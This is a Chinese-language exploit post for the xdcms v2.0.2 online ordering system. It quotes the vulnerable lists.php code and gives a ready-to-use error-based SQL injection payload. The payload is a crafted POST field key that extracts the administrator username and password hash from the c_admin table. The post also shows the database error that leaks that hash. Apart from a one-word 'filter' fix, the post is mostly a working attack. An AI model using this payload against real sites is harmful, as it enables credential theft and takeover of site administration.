网上订餐系统xdcms v2.0.2 0DAY 拿shell

网上订餐系统,外卖系统,xdcms提供专业订餐网站系统


在留言的地方
 lists.php文件
 <?php

 class lists extends db{

         public function init(){

                 $input=base::load_class('input');

                 $formid=isset($_GET['formid'])?intval($_GET['formid']):0;

                 $form_arr=base::load_cache("cache_form","_form");

                 $form=get_array($form_arr,'id',$formid,0);

                 $field=base::load_cache("cache_form_".$form[0]['form_table'],"_field");

                 $fields="";

                 if(is_array($field)){

                         foreach($field as $value){

                                 $fields.="<tr>n";

                                 $fields.="<td align="right">".$value['name'].":</td>n";

                                 $fields.="<td>".$input->$value['formtype']($value['field'],'',$value['width'],$value['height'],$value['initial'])." ".$value['explain']."</td>n";

                                 $fields.="</tr>n";

                         }

                         //是否显示验证码

                         if($form['0']['is_code']==1){

                                 $fields.="<tr>n";

                                 $fields.="<td align="right">验证码:</td>n";

                                 $fields.="<td><input type="text" name="verifycode" id="verifycode" /><img src="adminerifycode.php" border="0" alt="验证码,看不清楚?请点击刷新验证码" onClick="this.src=this.src+'?'+Math.random();"/></td>n";

                                 $fields.="</tr>n";

                         }

                 }

                 assign("form",$form[0]);

                 assign("fields",$fields);

                 assign('menu',get_menu(0,1));

                 template("form_list");

         }

         public function add_save(){ //保存的时候出现问题,From hi.baidu.com/w5r2

                 $formid=safe_html($_GET['formid']);

                 $form_arr=base::load_cache("cache_form","_form");

                 $form=get_array($form_arr,'id',$formid,0);

                 $fields=$_POST['fields'];

                 $verifycode=$_POST['verifycode'];

                 //验证码

                 if($form['0']['is_code']==1 && $verifycode!=$_SESSION['code']){

                         showmsg(C('verifycode_error'),'-1');

                 }

                 if(empty($fields['title'])||empty($formid)){

                         showmsg(C('material_not_complete'),'-1');

                 }

                 $form=formtable($formid);

                 if(empty($form)){

                         showmsg(C('error'),'-1');

                 }

                 $table=$this->mysql->show_table();   //判断数据表是否存在

                 if(!in_array(DB_PRE.$form,$table)){

                         showmsg(C('table_not_exist'),'-1');

                 }

                 //添加附加表

                 $sql_fields='`inputtime`';

                 $sql_value=datetime();

                 $send_text='留言内容:<br>';

                 foreach($fields as $key=>$value){

                         $sql_fields.=",`".$key."`";//看见了吧,就是这个地方 From http://oxp.vaiwan.com

                         if(is_array($value)){

                                 $value_arr='';

                                 foreach($value as $k=>$v){

                                         $value_arr.=$v.',';

                                 }

                                 $value=$value_arr;

                         }

                         $sql_value.=","".safe_replace(safe_html($value)).""";

                         $send_text.=safe_replace(safe_html($value))."<br>";

                 }

                 $this->mysql->query("insert into ".DB_PRE.$form."({$sql_fields}) values ({$sql_value})"); //这个地址存在注入问题 From oxp.vaiwan.com

                 $rs=$this->mysql->get_one("select * from ".DB_PRE."form where id=".$formid);

                 if($rs['is_email']==1){

                         sendmail('有人给您留言了!',$send_text);

                 }

                 showmsg(C('add_success'),'-1');

         }

 }

 ?>

 现在上利用代码看看:

http://127.0.0.1/xdcms_v2.0.2/index.php?m=form&c=lists&formid=7

 POST数据

 fields%5Btitle%5D=1

 &fields%5B

 ooxx`) values(1,1, (select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20concat(0x6F756F757E,username,0x2D,password,0x7E31)%20FROM%20c_admin%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))#]=22

 &fields%5Baddress%5D=4

 &fields%5Bcontent%5D=55555

 &verifycode=9d53

 &submit=+%CC%E1+%BD%BB+
 操作数据库失败Duplicate entry 'ouou~admin-5a0408a553574230cd46a508b03af127~11' for key 'group_key'

 sql:insert into c_message(`inputtime`,`title`,`ooxx`) values(1,1, (select 1 from(select count(*),concat((select (select (SELECT concat(0x6F756F757E,username,0x2D,password,0x7E31) FROM c_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a))#`,`address`,`content`) values(1351247382,"1","22","4","55555")

 就这样。OK

修复方案-
过滤!
THE END
分享
二维码
< <上一篇
下一篇>>